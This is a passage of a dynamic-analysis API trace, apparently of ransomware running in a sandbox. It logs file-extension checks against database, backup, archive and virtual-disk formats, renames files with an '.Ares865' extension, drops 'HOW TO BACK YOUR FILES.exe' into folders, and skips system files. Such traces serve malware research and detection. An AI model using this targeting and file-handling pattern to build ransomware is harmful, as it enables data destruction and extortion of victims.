lpString2="cat") returned -1 [0065.322] lstrlenW (lpString="cdb") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="cdb") returned -1 [0065.322] lstrlenW (lpString="ckp") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="ckp") returned -1 [0065.322] lstrlenW (lpString="cma") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="cma") returned -1 [0065.322] lstrlenW (lpString="cpd") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="cpd") returned -1 [0065.322] lstrlenW (lpString="dacpac") returned 6 [0065.322] lstrcmpiW (lpString1="ink[1]", lpString2="dacpac") returned 1 [0065.322] lstrlenW (lpString="dad") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="dad") returned -1 [0065.322] lstrlenW (lpString="dadiagrams") returned 10 [0065.322] lstrlenW (lpString="daschema") returned 8 [0065.322] lstrcmpiW (lpString1="wlink[1]", lpString2="daschema") returned 1 [0065.322] lstrlenW (lpString="db-journal") returned 10 [0065.322] lstrlenW (lpString="db-shm") returned 6 [0065.322] lstrcmpiW (lpString1="ink[1]", lpString2="db-shm") returned 1 [0065.323] lstrlenW (lpString="db-wal") returned 6 [0065.323] lstrcmpiW (lpString1="ink[1]", lpString2="db-wal") returned 1 [0065.323] lstrlenW (lpString="dbc") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dbc") returned -1 [0065.323] lstrlenW (lpString="dbs") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dbs") returned -1 [0065.323] lstrlenW (lpString="dbt") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dbt") returned -1 [0065.323] lstrlenW (lpString="dbv") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dbv") returned -1 [0065.323] lstrlenW (lpString="dbx") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dbx") returned -1 [0065.323] lstrlenW (lpString="dcb") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dcb") returned -1 [0065.323] lstrlenW (lpString="dct") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dct") returned -1 [0065.323] lstrlenW (lpString="dcx") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dcx") returned -1 [0065.323] lstrlenW (lpString="ddl") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="ddl") returned -1 [0065.323] lstrlenW (lpString="dlis") returned 4 [0065.323] lstrcmpiW (lpString1="k[1]", lpString2="dlis") returned 1 [0065.323] lstrlenW (lpString="dp1") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dp1") returned -1 [0065.323] lstrlenW (lpString="dqy") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dqy") returned -1 [0065.323] lstrlenW (lpString="dsk") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dsk") returned -1 [0065.323] lstrlenW (lpString="dsn") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dsn") returned -1 [0065.323] lstrlenW (lpString="dtsx") returned 4 [0065.323] lstrcmpiW (lpString1="k[1]", lpString2="dtsx") returned 1 [0065.323] lstrlenW (lpString="dxl") returned 3 [0065.323] lstrcmpiW (lpString1="[1]", lpString2="dxl") returned -1 [0065.323] lstrlenW (lpString="eco") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="eco") returned -1 [0065.324] lstrlenW (lpString="ecx") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="ecx") returned -1 [0065.324] lstrlenW (lpString="edb") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="edb") returned -1 [0065.324] lstrlenW (lpString="epim") returned 4 [0065.324] lstrcmpiW (lpString1="k[1]", lpString2="epim") returned 1 [0065.324] lstrlenW (lpString="fcd") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fcd") returned -1 [0065.324] lstrlenW (lpString="fdb") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fdb") returned -1 [0065.324] lstrlenW (lpString="fic") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fic") returned -1 [0065.324] lstrlenW (lpString="flexolibrary") returned 12 [0065.324] lstrlenW (lpString="fm5") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fm5") returned -1 [0065.324] lstrlenW (lpString="fmp") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fmp") returned -1 [0065.324] lstrlenW (lpString="fmp12") returned 5 [0065.324] lstrcmpiW (lpString1="nk[1]", lpString2="fmp12") returned 1 [0065.324] lstrlenW (lpString="fmpsl") returned 5 [0065.324] lstrcmpiW (lpString1="nk[1]", lpString2="fmpsl") returned 1 [0065.324] lstrlenW (lpString="fol") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fol") returned -1 [0065.324] lstrlenW (lpString="fp3") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fp3") returned -1 [0065.324] lstrlenW (lpString="fp4") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fp4") returned -1 [0065.324] lstrlenW (lpString="fp5") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fp5") returned -1 [0065.324] lstrlenW (lpString="fp7") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fp7") returned -1 [0065.324] lstrlenW (lpString="fpt") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="fpt") returned -1 [0065.324] lstrlenW (lpString="frm") returned 3 [0065.324] lstrcmpiW (lpString1="[1]", lpString2="frm") returned -1 [0065.324] lstrlenW (lpString="gdb") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="gdb") returned -1 [0065.325] lstrlenW (lpString="gdb") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="gdb") returned -1 [0065.325] lstrlenW (lpString="grdb") returned 4 [0065.325] lstrcmpiW (lpString1="k[1]", lpString2="grdb") returned 1 [0065.325] lstrlenW (lpString="gwi") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="gwi") returned -1 [0065.325] lstrlenW (lpString="hdb") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="hdb") returned -1 [0065.325] lstrlenW (lpString="his") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="his") returned -1 [0065.325] lstrlenW (lpString="ib") returned 2 [0065.325] lstrcmpiW (lpString1="1]", lpString2="ib") returned -1 [0065.325] lstrlenW (lpString="idb") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="idb") returned -1 [0065.325] lstrlenW (lpString="ihx") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="ihx") returned -1 [0065.325] lstrlenW (lpString="itdb") returned 4 [0065.325] lstrcmpiW (lpString1="k[1]", lpString2="itdb") returned 1 [0065.325] lstrlenW (lpString="itw") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="itw") returned -1 [0065.325] lstrlenW (lpString="jet") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="jet") returned -1 [0065.325] lstrlenW (lpString="jtx") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="jtx") returned -1 [0065.325] lstrlenW (lpString="kdb") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="kdb") returned -1 [0065.325] lstrlenW (lpString="kexi") returned 4 [0065.325] lstrcmpiW (lpString1="k[1]", lpString2="kexi") returned -1 [0065.325] lstrlenW (lpString="kexic") returned 5 [0065.325] lstrcmpiW (lpString1="nk[1]", lpString2="kexic") returned 1 [0065.325] lstrlenW (lpString="kexis") returned 5 [0065.325] lstrcmpiW (lpString1="nk[1]", lpString2="kexis") returned 1 [0065.325] lstrlenW (lpString="lgc") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="lgc") returned -1 [0065.325] lstrlenW (lpString="lwx") returned 3 [0065.325] lstrcmpiW (lpString1="[1]", lpString2="lwx") returned -1 [0065.326] lstrlenW (lpString="maf") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="maf") returned -1 [0065.326] lstrlenW (lpString="maq") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="maq") returned -1 [0065.326] lstrlenW (lpString="mar") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mar") returned -1 [0065.326] lstrlenW (lpString="marshal") returned 7 [0065.326] lstrcmpiW (lpString1="link[1]", lpString2="marshal") returned -1 [0065.326] lstrlenW (lpString="mas") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mas") returned -1 [0065.326] lstrlenW (lpString="mav") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mav") returned -1 [0065.326] lstrlenW (lpString="maw") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="maw") returned -1 [0065.326] lstrlenW (lpString="mdbhtml") returned 7 [0065.326] lstrcmpiW (lpString1="link[1]", lpString2="mdbhtml") returned -1 [0065.326] lstrlenW (lpString="mdn") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mdn") returned -1 [0065.326] lstrlenW (lpString="mdt") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mdt") returned -1 [0065.326] lstrlenW (lpString="mfd") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mfd") returned -1 [0065.326] lstrlenW (lpString="mpd") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mpd") returned -1 [0065.326] lstrlenW (lpString="mrg") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mrg") returned -1 [0065.326] lstrlenW (lpString="mud") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mud") returned -1 [0065.326] lstrlenW (lpString="mwb") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="mwb") returned -1 [0065.326] lstrlenW (lpString="myd") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="myd") returned -1 [0065.326] lstrlenW (lpString="ndf") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="ndf") returned -1 [0065.326] lstrlenW (lpString="nnt") returned 3 [0065.326] lstrcmpiW (lpString1="[1]", lpString2="nnt") returned -1 [0065.327] lstrlenW (lpString="nrmlib") returned 6 [0065.327] lstrcmpiW (lpString1="ink[1]", lpString2="nrmlib") returned -1 [0065.327] lstrlenW (lpString="ns2") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="ns2") returned -1 [0065.327] lstrlenW (lpString="ns3") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="ns3") returned -1 [0065.327] lstrlenW (lpString="ns4") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="ns4") returned -1 [0065.327] lstrlenW (lpString="nsf") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="nsf") returned -1 [0065.327] lstrlenW (lpString="nv") returned 2 [0065.327] lstrcmpiW (lpString1="1]", lpString2="nv") returned -1 [0065.327] lstrlenW (lpString="nv2") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="nv2") returned -1 [0065.327] lstrlenW (lpString="nwdb") returned 4 [0065.327] lstrcmpiW (lpString1="k[1]", lpString2="nwdb") returned -1 [0065.327] lstrlenW (lpString="nyf") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="nyf") returned -1 [0065.327] lstrlenW (lpString="odb") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="odb") returned -1 [0065.327] lstrlenW (lpString="odb") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="odb") returned -1 [0065.327] lstrlenW (lpString="oqy") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="oqy") returned -1 [0065.327] lstrlenW (lpString="ora") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="ora") returned -1 [0065.327] lstrlenW (lpString="orx") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="orx") returned -1 [0065.327] lstrlenW (lpString="owc") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="owc") returned -1 [0065.327] lstrlenW (lpString="p96") returned 3 [0065.327] lstrcmpiW (lpString1="[1]", lpString2="p96") returned -1 [0065.327] lstrlenW (lpString="p97") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="p97") returned -1 [0065.328] lstrlenW (lpString="pan") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="pan") returned -1 [0065.328] lstrlenW (lpString="pdb") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="pdb") returned -1 [0065.328] lstrlenW (lpString="pdm") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="pdm") returned -1 [0065.328] lstrlenW (lpString="pnz") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="pnz") returned -1 [0065.328] lstrlenW (lpString="qry") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="qry") returned -1 [0065.328] lstrlenW (lpString="qvd") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="qvd") returned -1 [0065.328] lstrlenW (lpString="rbf") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="rbf") returned -1 [0065.328] lstrlenW (lpString="rctd") returned 4 [0065.328] lstrcmpiW (lpString1="k[1]", lpString2="rctd") returned -1 [0065.328] lstrlenW (lpString="rod") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="rod") returned -1 [0065.328] lstrlenW (lpString="rodx") returned 4 [0065.328] lstrcmpiW (lpString1="k[1]", lpString2="rodx") returned -1 [0065.328] lstrlenW (lpString="rpd") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="rpd") returned -1 [0065.328] lstrlenW (lpString="rsd") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="rsd") returned -1 [0065.328] lstrlenW (lpString="sas7bdat") returned 8 [0065.328] lstrcmpiW (lpString1="wlink[1]", lpString2="sas7bdat") returned 1 [0065.328] lstrlenW (lpString="sbf") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="sbf") returned -1 [0065.328] lstrlenW (lpString="scx") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="scx") returned -1 [0065.328] lstrlenW (lpString="sdb") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="sdb") returned -1 [0065.328] lstrlenW (lpString="sdc") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="sdc") returned -1 [0065.328] lstrlenW (lpString="sdf") returned 3 [0065.328] lstrcmpiW (lpString1="[1]", lpString2="sdf") returned -1 [0065.329] lstrlenW (lpString="sis") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="sis") returned -1 [0065.329] lstrlenW (lpString="spq") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="spq") returned -1 [0065.329] lstrlenW (lpString="te") returned 2 [0065.329] lstrcmpiW (lpString1="1]", lpString2="te") returned -1 [0065.329] lstrlenW (lpString="teacher") returned 7 [0065.329] lstrcmpiW (lpString1="link[1]", lpString2="teacher") returned -1 [0065.329] lstrlenW (lpString="tmd") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="tmd") returned -1 [0065.329] lstrlenW (lpString="tps") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="tps") returned -1 [0065.329] lstrlenW (lpString="trc") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="trc") returned -1 [0065.329] lstrlenW (lpString="trc") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="trc") returned -1 [0065.329] lstrlenW (lpString="trm") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="trm") returned -1 [0065.329] lstrlenW (lpString="udb") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="udb") returned -1 [0065.329] lstrlenW (lpString="udl") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="udl") returned -1 [0065.329] lstrlenW (lpString="usr") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="usr") returned -1 [0065.329] lstrlenW (lpString="v12") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="v12") returned -1 [0065.329] lstrlenW (lpString="vis") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="vis") returned -1 [0065.329] lstrlenW (lpString="vpd") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="vpd") returned -1 [0065.329] lstrlenW (lpString="vvv") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="vvv") returned -1 [0065.329] lstrlenW (lpString="wdb") returned 3 [0065.329] lstrcmpiW (lpString1="[1]", lpString2="wdb") returned -1 [0065.329] lstrlenW (lpString="wmdb") returned 4 [0065.329] lstrcmpiW (lpString1="k[1]", lpString2="wmdb") returned -1 [0065.329] lstrlenW (lpString="wrk") returned 3 [0065.330] lstrcmpiW (lpString1="[1]", lpString2="wrk") returned -1 [0065.330] lstrlenW (lpString="xdb") returned 3 [0065.330] lstrcmpiW (lpString1="[1]", lpString2="xdb") returned -1 [0065.330] lstrlenW (lpString="xld") returned 3 [0065.330] lstrcmpiW (lpString1="[1]", lpString2="xld") returned -1 [0065.330] lstrlenW (lpString="xmlff") returned 5 [0065.330] lstrcmpiW (lpString1="nk[1]", lpString2="xmlff") returned -1 [0065.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865") returned 85 [0065.330] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0065.330] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.331] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0065.331] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0065.331] CloseHandle (hObject=0x0) returned 0 [0065.331] CloseHandle (hObject=0x164) returned 1 [0065.331] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4abe0700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.331] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.331] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4abe0700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.331] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.331] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0065.331] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0065.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.331] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 67 [0065.331] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.331] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.331] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.332] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.332] GetLastError () returned 0x0 [0065.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.332] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.332] CloseHandle (hObject=0x12c) returned 1 [0065.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.332] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.332] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.332] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.332] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.332] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.333] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.333] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.333] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.333] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.333] lstrlenW (lpString="desktop.ini") returned 11 [0065.333] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 69 [0065.333] lstrcpyW (in: lpString1=0x2cce488, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.333] lstrlenW (lpString="desktop.ini") returned 11 [0065.333] lstrlenW (lpString="Ares865") returned 7 [0065.333] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.333] lstrlenW (lpString=".dll") returned 4 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.333] lstrlenW (lpString=".lnk") returned 4 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.333] lstrlenW (lpString=".ini") returned 4 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.333] lstrlenW (lpString=".sys") returned 4 [0065.333] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.333] lstrlenW (lpString="desktop.ini") returned 11 [0065.333] lstrlenW (lpString="bak") returned 3 [0065.333] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.333] lstrlenW (lpString="ba_") returned 3 [0065.333] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.334] lstrlenW (lpString="dbb") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.334] lstrlenW (lpString="vmdk") returned 4 [0065.334] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.334] lstrlenW (lpString="rar") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.334] lstrlenW (lpString="zip") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.334] lstrlenW (lpString="tgz") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.334] lstrlenW (lpString="vbox") returned 4 [0065.334] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.334] lstrlenW (lpString="vdi") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.334] lstrlenW (lpString="vhd") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.334] lstrlenW (lpString="vhdx") returned 4 [0065.334] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 